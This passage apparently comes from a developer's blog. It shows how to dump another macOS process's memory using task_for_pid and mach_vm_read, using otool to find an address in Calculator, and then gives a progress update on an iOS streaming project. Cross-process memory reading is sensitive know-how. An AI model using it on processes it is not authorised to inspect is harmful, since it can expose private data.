    fprintf(stderr, "mem_dump: failed to read data at 0x%lx (0x%x)\n", dump_base_addr, ret);
    return -1;
  }

The call to mach_vm_read() takes four arguments: a port identifying the target process, the base address, the amount of data to read, a pointer that will contain the address of the data in our address space, and a pointer to the size of data that was actually read.  One caveat to using mach_vm_read() is that the memory at the specified address must be readable.  As seen from the above code, the only real difficulty in using this function is figuring out what the base address is.

Finding The Base Address

The technique you use to find the base address will depend entirely on what you’re trying to accomplish.  For the sake of an example I’ll show you how I came up with the address 0x10000190c. To find this address I used the incredibly useful tool otool to disassemble the Calculator application.

dean@BigBertha:/Applications/Calculator.app/Contents/MacOS $ otool -t Calculator
Calculator:
(__TEXT,__text) section
000000010000190c 6a 00 48 89 e5 48 83 e4 f0 48 8b 7d 08 48 8d 75
000000010000191c 10 89 fa 83 c2 01 c1 e2 03 48 01 f2 48 89 d1 eb

The output of otool (in this invocation, it can do many other things) simply lists the bytes at the location specified in the first column of output.

Putting It All Together: Dumping Memory

Putting the usage of task_for_pid() and mach_vm_read() together it is possible to dump memory of a target process.  Full code for this program is available on GitHub.  To use the program do the following:

dean@BigBertha:~/scm/Kitchen-Sink $ gcc -Wall -o mac_dump mac_dump.c
dean@BigBertha:~/scm/Kitchen-Sink $ sudo ./mac_dump

This will create a file in the current directory called mem.dump which contains the memory dump.  Looking at the dump you’ll see that we’ve successfully read from the Calculator address space and saved the memory to disk.  You can see this using hexdump as follows.

dean@BigBertha:~/scm/Kitchen-Sink $ sudo hexdump mem.dump
0000000 6a 00 48 89 e5 48 83 e4 f0 48 8b 7d 08 48 8d 75
0000010 10 89 fa 83 c2 01 c1 e2 03 48 01 f2 48 89 d1 eb

If you were to translate this dump you’d find see that it contains the instructions seen earlier when we used otool.

Project Moped: The Final Push

It’s been quite awhile since I last posted an update on Project Moped so I thought I’d take a few minutes and get one out there.

Admittedly, due to being sick for a week and needing to meet other deadlines, I have not done nearly as much on this project in the last few weeks as I would have liked.  That being said I have made a fair bit of progress in getting a working system up and running.  On the iOS side of things I’ve been trying to find a way to stream media to the device.  The problem with this is that Apple is pretty set on developers using their streaming protocols.  So the workaround I was playing with is streaming my media to a file and then having the player read that.  Well it turns out, if you’re reading from the local disk the player requires the media to be fully intact so trying to use a file as a buffer doesn’t seem to work.  I still have a few other tricks to try, but it is getting down the wire so I may have to scrap live streaming playback and settle for some more abstract indication that the system is working (such as just writing the data to a file and monitoring the network rate).

Switching over to the library development side of things that has also seen a fair amount of progress.  The library is at a point where it can successfully send messages across the network so the next big step is to get all the protocol stuff in place so that everything can communicate.  As a test I wrote a little Python program that can send hand crafted packets over the network and have been sending to them my ‘edge node’.  The edge node is just a little program that listens on the network and responds as if it were trying to serve data.  I plan to transform that program into something is actually able to serve data, I just haven’t gotten around to it.

So overall there has been progress, but with only a few days to go time is definitely becoming tight.  I still feel like things, although behind, are in a reasonable position to get a working demo, it’s just a matter of pumping out the code and getting it done.